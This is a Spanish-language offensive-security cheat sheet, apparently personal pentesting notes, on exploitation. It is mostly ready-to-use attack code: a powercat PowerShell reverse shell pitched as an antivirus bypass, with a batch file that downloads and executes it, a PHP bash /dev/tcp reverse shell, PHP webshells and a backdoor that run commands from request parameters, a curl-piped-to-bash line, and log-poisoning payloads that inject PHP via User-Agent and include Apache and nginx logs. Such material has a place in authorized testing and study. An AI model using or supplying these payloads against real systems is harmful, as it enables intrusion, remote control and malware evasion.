🔥Explotación

Reverse Shells

Online - Reverse Shell Generatorwww.revshells.com

PowerShell Reverse Shell Full Interactiva

PowerShell-reverse-shell/powershell-reverse-shell.ps1 at main · martinsohn/PowerShell-reverse-shellGitHub

P0wny-Shell

GitHub - flozz/p0wny-shell: Single-file PHP shellGitHub

PowerShell Reverse Shell .ps1 + .bat - Powercat (Antivirus Bypass)

powercat -c <ip-a> -p <port> -e cmd -g > uwu.ps1

echo "powershell -c IEX (New-Object System.Net.Webclient).DownloadString(‘http://<ip-a>/uwu.ps1')" > uwu.bat

python3 -m http.server

nc -lvnp <port>

Oneliner PHP Reverse Shell

<?php system("bash -c 'bash -i &>/dev/tcp/<IP>/<port> <&1'");?>

Oneliner PHP Reader

<?php echo file_get_contents('/path/to/file'); ?>

OneLiner Webshells

<?php system($_GET["cmd"]); ?>

<?php echo shell_exec($_GET['cmd']); ?>

# Uso en URL por parámetro
cat.php?cmd=bash -c "bash -i <%26 /dev/tcp/<IPa>/<port> 0>%261"

# Uso por CURL
curl -s -X GET "http://<IP>/cat.php" | bash

Web Backdoor

<?php
if(isset($_REQUEST['cmd'])){
        echo "<pre>";
        $cmd = ($_REQUEST['cmd']);
        system($cmd);
        echo "</pre>";
        die;
}
?>

HTTP Log Poisoning.

curl -s -H "User-Agent: <?php system(\$_GET['cmd']); ?>" "http://<IPv>"

User-Agent: <?php system($_GET['cmd']); ?>

/var/log/apache2/access.log&cmd=id
/var/log/nginx/access.log&cmd=id

----------------------------------------------------------------------------------------------

Última actualización hace 4 meses